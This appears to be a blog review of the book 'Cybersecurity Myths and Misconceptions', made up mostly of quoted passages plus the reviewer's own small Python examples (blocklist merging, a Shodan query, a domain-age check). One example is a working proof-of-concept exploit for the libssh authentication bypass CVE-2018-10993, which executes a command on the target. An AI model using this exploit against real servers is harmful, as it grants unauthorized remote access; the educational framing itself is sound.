
Cybersecurity Myths and Misconceptions by Eugene H. Spafford et al. - A Book Review

Posted on February 4, 2025 • 17 minutes • 3616 words

The Book and the Authors

The book is written by three authors.

Eugene Howard Spafford is a professor at Purdue University. He is a well-known figure and researcher in computer science, known especially for his contributions to information security, cybercrime investigation, and information ethics.

Leigh Metcalf is a senior network security research analyst at the Computer Emergency Response Team (CERT) of Carnegie Mellon University’s Software Engineering Institute. She holds a PhD in mathematics and has worked as a systems engineer, architect, and security specialist.

Josiah Dykstra is an active figure in professional service, participating in working groups, organizations, and committees. He also wrote “Essential Cybersecurity Science” (2016), available on Amazon.

In the book, the authors list dozens of myths and misconceptions in cybersecurity. Some are quite common yet rarely questioned, such as the attribution of attacks: as a defender, do you really need to know the attacker’s identity before taking the necessary mitigation steps? Of course, mitigation is the priority rather than attribution. The book is an excellent and up-to-date reference for cybersecurity professionals. Whether you are new to the field or have years of experience, questioning your assumptions with the authors’ guidance is still worthwhile.

I want to thank the three distinguished authors for their valuable work, which supports the goal of creating a safer cyberspace.

Here are some citations from the book, available on Amazon, that caught my attention.

Citations from the book

Among the most powerful of defensive tools is critical thinking. (p.20)

Science can update, validate, and dispel cybersecurity myths by using standardized methods and producing valid evidence. (p.26)

One reason is that technology and threats change, but education is slow to catch up. Unless people take continuing education seriously, it’s easy to fall behind when old truths become modern myths. (p.27)

Some employees believed that links were more dangerous than attachments as clicking them automatically compromised the computer, while others argued that attachments were harmless if you did not allow them to install. (p.27)

Many kids in the 1980s believed that blowing on game cartridges would fix technical problems because dust might be causing issues. (p.28)

First, cybersecurity is not merely about protecting computers and networks. (p.29)

Second, cybersecurity involves computers; however, cybersecurity is primarily about humans. (p.29)

Computers are tools used by people, intended for people, and built by people. (p.30)

Third, sometimes computers malfunction. (p.30)

We see cybersecurity as human-centric. (p.30)

Cybersecurity experts should be viewed as enablers of good practice, as allies and educators—not as authoritarian arbiters of arcane rules who mete out punishment for transgressions. (p.30)

A ship in harbor is safe, but that is not what ships are built for. John A. Shedd (p.39)

As Lord Kelvin wrote, “I often say that when you can measure what you are speaking about, and express it in numbers, you know something about it; but when you cannot measure it, when you cannot express it in numbers, your knowledge is of a meagre and unsatisfactory kind.” (p.43)

Bruce Schneier summarized this difference in one of his Crypto-Grams: “Avoiding threats is black and white: either we avoid the threat, or we don’t. Avoiding risk is continuous: there is some amount of risk we can accept, and some we cannot.” (p.47)

If a workforce lives in constant fear of cyber threats or punishment for the wrong action, they will be unhappy, unproductive, and potentially paralyzed by fear. (p.54)

Cyber Threat Intelligence (CTI) is “evidence-based knowledge, including context, mechanisms, indicators, implications, and action-oriented advice about an existing or emerging menace or hazard to assets.” (p.55)

Threat intelligence takes many forms. On one end is a list of IP addresses, domains, or email addresses that one entity believes are malicious. (p.55)

[Value] comes from using only high-quality CTI that is timely, accurate, and actionable. (p.56)

A company might be worse off with more CTI if the costs outweigh the benefits; more CTI does not automatically result in better security. (p.56)

Blocklists are an example of CTI. People either sell them or provide them for free, and it’s an easy way to block known-bad IP addresses, domains, or malware hashes. There are dozens of such lists. The problem is that research has shown that these lists are mostly distinct. To use blocklists effectively, we need to collect all the lists. Yes, like Pokémon, gotta catch ’em all. That requires time, space, and processing. (p.56)
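
Since the book points out that published blocklists barely overlap, the only way to get broad coverage is to merge them all. Here is a minimal aggregation sketch in Python; the feed URLs and the `fetch_blocklist` helper are illustrative placeholders of my own, not sources named in the book:

```python
import urllib.request

# Hypothetical feed URLs -- substitute real blocklist sources you trust.
FEEDS = [
    "https://example.org/blocklist-a.txt",
    "https://example.net/blocklist-b.txt",
]

def fetch_blocklist(url: str) -> set[str]:
    """Download one plaintext feed and return its entries as a set."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        lines = resp.read().decode("utf-8", errors="replace").splitlines()
    # Skip blanks and comments; one indicator (IP, domain, or hash) per line.
    return {ln.strip() for ln in lines if ln.strip() and not ln.startswith("#")}

def aggregate(feeds: list[str]) -> set[str]:
    """Union all feeds ("gotta catch 'em all"), since the lists barely overlap."""
    merged: set[str] = set()
    for url in feeds:
        merged |= fetch_blocklist(url)
    return merged

if __name__ == "__main__":
    indicators = aggregate(FEEDS)
    print(f"{len(indicators)} unique indicators across {len(FEEDS)} feeds")
```

Even this toy version shows the cost the authors mention: every extra feed adds fetch time, storage, and deduplication work.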

For example, in the Financial Services ISAC, more than 7,000 members in 70-plus countries collaborate and share confidential threat intelligence. (p.56)

Attackers, similar to other humans, are lazy. (p.60)

Some estimates suggest that OSS makes up 70% of current software applications. (p.63)

Most code producers are interested in fast and cheap, and the processes shown to reduce defects are not known for those qualities. (p.65)

Attackers target domain controllers because that’s a server that member computers trust. (p.67)

We cannot change our fingerprints if they are our authenticators and are compromised. (p.69)

Hackers also demand proof-of-concept examples to be taken seriously. One publication puts a fine point on this: International Journal of Proof-of-Concept or Get the Fuck Out. (p.71)

There is an endless amount of cybersecurity-related activity and behavior that is legal and technically achievable, yet inadvisable. (p.76)

Yes, Virginia, there was an IPv5, but it was never standardized. There also were protocols IPv7–IPv9. (p.82)

One expert on domain name use, Paul Vixie, has suggested that if we block all new domains for 24 hours after they are created, the amount of spam we see will drop significantly. (p.87)
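
Vixie’s suggestion is easy to prototype: look up a domain’s registration age and refuse it while it is younger than 24 hours. A minimal sketch, assuming the third-party `python-whois` package (my choice, not the book’s); a production system would use registrar zone feeds rather than a per-lookup WHOIS query:

```python
from datetime import datetime, timedelta

import whois  # third-party "python-whois" package (an assumption, not from the book)

def is_too_new(domain: str, min_age: timedelta = timedelta(hours=24)) -> bool:
    """Return True if the domain was registered less than min_age ago."""
    record = whois.whois(domain)
    created = record.creation_date
    # python-whois may return a list when several dates are on file.
    if isinstance(created, list):
        created = min(created)
    if created is None:
        return True  # no creation date on record: treat cautiously as too new
    return datetime.now() - created < min_age

print(is_too_new("example.com"))  # long-registered, so expect False
```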

The defense that works today might not work tomorrow. That is why security is not a set of things you do and then forget about them; instead, cybersecurity is a continuing activity that needs to adapt and change with time and circumstances. (p.88)

They also lead to nonsense such as Non-fungible Tokens (NFTs) (and no, we are not going to go into depth on why those are beyond silly and into the realm of Ponzi schemes). (p.95)

The TOR Project, a nonprofit that works on software used on the dark web, is partly funded by the U.S. State Department to promote democracy and human rights in oppressive regimes. (p.96)

The TOR Project website has a notice that “Generally it is impossible to have perfect anonymity, even with TOR.” (p.96)

Humans evolved to avoid physical world danger, but identifying danger online is more complicated and difficult. (p.103)

Some organizations have a “three strikes” rule for some behaviors: warning on the first occasion, retraining on the second violation, and job termination on the third violation. (p.107)

In 2004, James Surowiecki wrote a well-known book titled The Wisdom of Crowds: Why the Many Are Smarter Than the Few and How Collective Wisdom Shapes Business, Economies, Societies and Nations. He described how large groups show more intelligence in some situations than individuals or smaller groups. This idea dates back thousands of years to Aristotle. It is also related to the concept of democracy. (p.107)

The wisdom of crowds should guide fact-based decisions but should never replace deliberate, informed thinking. (p.108)

To quote the great Arthur C. Clarke: “Two possibilities exist: either we are alone in the Universe, or we are not. Both are equally terrifying.” (p.108)

To channel Donald Rumsfeld, there are known unknowns and unknown unknowns in cybersecurity. (p.109)

Absence of evidence is not evidence of absence. (p.116)

Many years ago, the City of Atlanta had an emergency announcement line. In a time of grave public danger, one of the city leaders could call an unpublished phone number and speak an announcement, which would be broadcast on all the local radio and television stations. Note: No passcode was required—security by obscurity at its finest. If nobody knows the number, nobody will call it. (p.121)

If someone launches a secret web server and tells nobody about it, Shodan will still find it in under a week. (p.121)
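
That discovery happens because Shodan continuously scans the Internet and indexes service banners. As a quick illustration, here is a sketch using the official `shodan` Python client; the API key and the query are placeholders, and search filters like this require a paid API plan:

```python
import shodan

API_KEY = "YOUR_SHODAN_API_KEY"  # placeholder
api = shodan.Shodan(API_KEY)

# Search for banners that look like a hypothetical "secret" internal server.
results = api.search('http.title:"internal staging"')
print(f"Total results: {results['total']}")
for match in results["matches"][:5]:
    print(match["ip_str"], match["port"], match.get("org", "n/a"))
```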

To be fair, adding obscurity might add to security. An unpublished bit of information might be found through effort or luck, but it requires something extra on the attacker’s part. Sometimes, imposing that additional cost is enough to make a system less attractive than another or to keep an automated attack from working. So long as it is not the only or primary defense, it might have some value. (p.123)

Is High-Tech Better than Low-Tech? It feels like a trick question, doesn’t it? See the Arthur C. Clarke short story “Superiority” for a fictional version of this. (p.127)

Opportunity cost is the loss of potential gain from other alternatives when one alternative is chosen. (p.133)

Opportunity cost should be an integral aspect of cybersecurity in every decision. (p.134)

Can opportunity cost ever be positive? It can, according to U.S. Cyber Command, which routinely discusses the goal of “imposing cost” on adversaries. Honeypots are one example of this because they consume an attacker’s time and effort without causing real damage. (p.134)

Correlation does not mean causation, but it can give a nudge that the items should be examined more closely to see if there is a functional relationship. (p.142)

Anomalous is not a synonym for malicious, the same as correlation does not mean causation. (p.154)

A Black Swan event occurs outside the realm of imagined possibility. (p.154)

[Consider the] Carrington Event and the possibility of a Cumbre Vieja tsunami. (p.155)

It’s a common characteristic to assume that good things will happen and that bad things will not. In probabilistic terms, we think that good things are more likely to happen, and bad things are less likely to happen. The Valence Effect is this tendency to overestimate the likelihood of good things happening rather than bad things. (p.158)

The action bias is where we prefer action to inaction, even when it is counterproductive. (p.167)

The omission bias: the tendency to favor inaction (omission) over action. (p.168)

You did keep a copy of the card in your safe deposit box, right? This is a form of key escrow. We should be sure we have some protected, alternate copy of critical information in case we lose our current list. (p.169)

The ones that are caught are not a threat; the ones that are not caught are the threat. (p.171)

For important questions, consider starting to keep track of information you might need to make a future decision. (p.176)

Thus, an estimate of two hours would be quoted to management as five days; our experience has shown this is often a reasonable estimate. (p.179)

Cobra effect. It is named for something that happened when the British ruled India. The officials of the Raj wanted to decrease the number of cobras. So, leadership offered a bounty for every dead cobra. At first, it worked, and the population of cobras decreased. But, unsurprisingly in retrospect, people began to breed cobras, knowing they could get rewards. Once the British found out this was happening, they canceled the bounty. The people breeding the cobras no longer had any incentive to keep breeding them, so many of them simply released all their cobras into the wild. The result was an increase in the number of cobras compared to before the bounty program existed. (p.186)

Some Internet service providers quarantine infected machines, an approach known as a walled garden. (p.189)

Rome was not built in a day, and when it was constructed, some buildings were fine and some were torn down (or collapsed). It was not a case where a magic wand was waved, and an entire city showed up perfectly constructed from the start; instead, it was a case where the Romans learned as they went along. (p.200)

In science, negative results are findings that do not support the hypothesis. (p.200)

Cybersecurity generally does a poor job of documenting and sharing negative results. We almost always see presentations and papers talking about positive results. We should also be sharing things we tried that did not work so that others can learn from our attempts. (p.200)

Cybersecurity studies how this data is misused and altered, by malware, vulnerabilities, malicious websites, or any other badness. (p.204)

Spending valuable time and effort to optimize a solution used only a few times while other important tasks are pending should be avoided. (p.206)

The right-hand rule says that when you enter a maze, put your right hand on the wall and then continue to follow the right wall, which will eventually lead you to the exit. (p.206)
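
The right-hand rule is a classic wall follower and translates directly into code. Below is a toy sketch over a grid maze of my own construction (not from the book); note that the rule only guarantees an exit when the walls are connected to the outer boundary:

```python
# Directions: up, right, down, left (clockwise order).
DIRS = [(-1, 0), (0, 1), (1, 0), (0, -1)]

def right_hand_escape(maze: list[str], start: tuple[int, int], facing: int):
    """Wall follower: always try to turn right first, then go straight,
    then left, then reverse. maze uses '#' for walls and '.' for open cells;
    stepping off the grid through a border opening counts as escaping."""
    rows, cols = len(maze), len(maze[0])
    r, c = start
    path = [(r, c)]
    for _ in range(4 * rows * cols):  # safety bound against endless loops
        for turn in (1, 0, 3, 2):  # right, straight, left, reverse
            d = (facing + turn) % 4
            nr, nc = r + DIRS[d][0], c + DIRS[d][1]
            if not (0 <= nr < rows and 0 <= nc < cols):
                return path  # stepped off the grid: we found the exit
            if maze[nr][nc] == ".":
                facing, r, c = d, nr, nc
                path.append((r, c))
                break
    return None  # no exit reachable with a wall follower

maze = [
    "#.###",
    "#...#",
    "###.#",
    "#...#",
    "###.#",
]
# Enter through the opening at the top, initially facing down.
print(right_hand_escape(maze, start=(0, 1), facing=2))
```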

Tischer, Matthew, et al., “Users Really Do Plug in USB Drives They Find,” IEEE Symposium on Security and Privacy, IEEE, 2016. (p.208)

Ransomware first appeared in 1989, but it was not until Bitcoin was invented in 2008 that it became a thing. (p.211)

The first formal degree-granting program in computer science was started in October 1962 at (surprise) Purdue, and the first cybersecurity degree was initiated in 2000 at… wait for it… Purdue University. Compared to chemistry, psychology, and mathematics, these are new fields. (p.212)

Someone immersed in self-study, perhaps including military training or industry internships, with significant motivation and talent, might also have a deep skillset. (p.215)

Instead of worrying about how to produce more firefighters, perhaps we should put some effort into reducing the construction of buildings from gasoline-soaked balsa wood. (p.220)

The Clarifying Lawful Overseas Use of Data Act (CLOUD Act) is a U.S. federal law that allows federal law enforcement to compel U.S.-based tech companies to hand over data stored on servers without regard to where it is physically stored. (p.246)

Once we have cloud data centers in orbit or on the Moon, we will have some interesting litigation issues. (p.247)

This phrase originated when Slashdot, a popular tech news site, would link to websites in its posts and sometimes overload the linked site with a sudden surge of visitors. See the Slashdot Effect. (p.273)

To avoid the pitfall of believing that security tools are inherently secure and trustworthy, treat them with at least some caution and due diligence. Vulnerabilities can be anywhere. (p.276)

The vulnerability scanner looks for something that could happen, and the malware scanner (or IDS) looks for something that did happen. (p.277)

If there are too many false alarms, it can lead to the assumption that every alarm is a false positive—the “cry wolf” effect. (p.277)

Finding nothing does not mean there is nothing to find. (p.277)

Humans have, so far, mapped only about 20% of the oceans. That means that 80% of the seafloor under the earth’s water has never been examined. There are things in the sea we do not know about. Luckily, for oceans, we can say, “We have mapped this much, and we do not know about the rest.” Cybersecurity is not that precise. We can say we know things, but we cannot express how much we do not know. (p.278)

Threat hunting: hunting for a new attack that bypassed the current alarms. (p.279)

The catalog for CWEs runs the gamut, from CWE-121, stack-based overflow, to CWE-546, suspicious comment. As of this writing, no CVE has been tagged with a suspicious comment CWE—though one could take this comment about a suspicious comment CWE as being suspicious and assign that CWE to it. (p.284)

Security vendor Mandiant, for instance, considers a zero-day to be anything without a patch available, even if it is known to the public. (p.288)

A simple phishing email or phone call asking for information is more successful than most people think. (p.292)

CVE-2018-10993 disproves that. A remote user would connect, and before giving their password, they could send the string MSG_USERAUTH_SUCCESS and then, surprise, the connection was allowed. (p.295)
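
The bypass the authors describe was demonstrated by a widely circulated proof of concept, sketched below using the third-party `paramiko` library; the host is a placeholder, and this should only ever be run against a lab machine you own that still runs an unpatched libssh (before 0.7.6/0.8.4):

```python
import socket

import paramiko  # third-party SSH library, used here as a raw SSH client

HOST = "192.0.2.10"  # placeholder: a lab machine running vulnerable libssh

sock = socket.socket()
sock.connect((HOST, 22))
transport = paramiko.transport.Transport(sock)
transport.start_client()

# Tell the server "authentication already succeeded." Vulnerable libssh
# versions take the client's word for it and mark the session authenticated.
msg = paramiko.message.Message()
msg.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(msg)  # _send_message is paramiko-internal

channel = transport.open_session(timeout=5)
channel.exec_command("id")
print(channel.recv(1024).decode())
```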

Only 5% of vulnerabilities published in the CVE database had published exploits. (p.295)

It is not the users’ fault that they are using the default configuration. It is wrong to assume that everyone buying an appliance will be an expert and be able to tweak it perfectly. (p.296)

The surest way to get some programmers to write a program is to tell them it cannot be done. (p.306)

Sometimes there is no way to repair the software, and we must build our defenses around it. (p.308)

The Hippocratic Oath starts with “Primum non nocere,” meaning “First, do no harm.” Security practitioners should follow that rule as well. (p.311)

Focus on risk and mitigation, not on names. (p.312)

Even legitimate capabilities can be used to achieve mischief; using built-in programs and features to avoid the detection of custom malware even has a name: living off the land. (p.314)

Algorithms and data references can be incredibly complex. For a historical analogy, consider the Antikythera mechanism, discovered in 1901. It was not until 2021 that scientists figured out how it probably worked. (p.321)

Many criminal organizations in Russia write ransomware that is not intended to run inside Russia. The Russian government tolerates the criminals (and might even sometimes employ them) so long as they do not target Russians. (p.322)

One study found that a small set of countries hosted 85% of the distribution sites for malware. (p.323)

There are undoubtedly even larger pieces of malware. Some items now contain virtual machine emulators and their own in-memory file systems. (p.327)

The first ransomware goes back at least to 1989 and was spread by floppy disk. A researcher spread it by handing out 20,000 floppy disks at a conference. (p.332)

A group project named No More Ransom collects keys and tools to help you retrieve your data. (p.333)

Suppose a bank president assumes that a small team of junior staff who primarily reset account passwords can also respond to ransomware. (p.339)

One instance of an APT installation might be found, but three others by different groups might also be present. (p.343)

Attribution does not defend networks. Instead, when investigating incidents, consider this mantra: “It is not ‘Who did this?’ but ‘Why me, and how?’ ” This statement acknowledges that the most important consideration for companies and citizens is not necessarily identifying, prosecuting, or eliminating a specific threat actor. (p.354)

To many individuals and businesses, attribution is at most a minor concern compared to protecting assets. (p.355)

In 2013, Anton Chuvakin at Gartner first introduced the phrase endpoint detection and response (EDR). (p.358)

Fun fact: Hovering around your security team is likely to slow them down if you are the CEO in this situation. Give them space, time, and resources rather than your expert attention. (p.360)

If you torture the data long enough, it will confess. — Ronald Coase, as quoted by Irving John Good (p.363)

There is the old story that there is no Nobel Prize in Mathematics because Alfred Nobel’s wife slept with a mathematician. Although we doubt a quick nap would lead to enmity, the implication is that she was awake—enthusiastically. That story, however, is another myth; Alfred Nobel was never married. (p.363)

If that program labels an IP address as malicious when it is not, it has given us a false positive. If it does not tell us that an IP address is malicious when it is, it is a false negative. (p.376)
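
Those two definitions are easy to turn into a measurement whenever you evaluate a detector. A minimal sketch with made-up, illustrative data:

```python
# Ground truth vs. a detector's verdicts for five IP addresses (illustrative).
truth = {
    "malicious": {"203.0.113.5", "198.51.100.7"},
    "benign": {"192.0.2.1", "192.0.2.2", "192.0.2.3"},
}
flagged = {"203.0.113.5", "192.0.2.2"}  # what the detector labeled malicious

false_positives = flagged & truth["benign"]    # flagged, but actually benign
false_negatives = truth["malicious"] - flagged  # malicious, but missed

print("False positives:", false_positives)  # {'192.0.2.2'}
print("False negatives:", false_negatives)  # {'198.51.100.7'}
```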

Data bias is also a feature of cybersecurity in general. We generally can collect only data we happen to find. That can lead to biases in the data, so we must acknowledge that possibility and be careful. (p.379)

Artificial intelligence is not intelligent. (p.382)

The unfortunate thing is, people often do not report false negatives and false positives. An ML box that does not tell you these two values is not useful and can be misleading. (p.385)

The goal of a visualization is to communicate and help a viewer understand the information or answer a specific question. (p.387)

Research has shown that the use of carefully designed checklists, evolved based on experience, is incredibly helpful in avoiding some mistakes. (p.396)

Preparation is usually more straightforward and less costly than remediation. (p.396)

You might have heard that “Forgiveness is simpler to obtain than permission.” Avoid situations where that is the modus operandi because it is not always true. If you are a manager or supervisor, do not build or encourage that environment. Similarly, “Move fast and break things” might seem like a formula for success with start-ups, but it is a lousy and unsuitable way to pursue quality, safety, privacy, and security. If you work in any of those -y areas, you want your colleagues to naturally envision you as saying, “Let me show you how to do that better” rather than, “No, you cannot do that!” or “We will worry about that in the next release.” That is, become a welcoming guru rather than a stern gatekeeper. (p.397)

If you welcome discussion and questions, you might be less likely to fall victim to your own misconceptions. (p.397)

In a less technological sense, we can be better myth busters if we are humble and acknowledge that myths and misconceptions are a part of life. (p.399)

Professional associations and meetings are one way to exchange ideas and quell myths. (p.400)

[N]o documented threat model captures the circumstances in which that valuable intellectual property is at risk. (p.401)

Companies grow and change. Assuming decisions made in the beginning are always correct is a bad idea. (p.402)

All decisions should be written down along with the important “why.” If you do not write it down, you might find yourself subject to the 2 a.m. phone call demanding an explanation. (p.402)

As Robert H. Courtney, Jr., expressed in his Third Law: “There are no technical solutions to management problems, but there are management solutions to technical problems.” (p.404)

Focus on respected publications, seminars, and classes held by professional nonprofit associations such as ACM, USENIX, and ISSA. Note that the mark of good science and engineering is the willingness to change approaches based on new evidence; politics and religion are where people claim to have the absolute, immutable facts, not cybersecurity. (p.405)
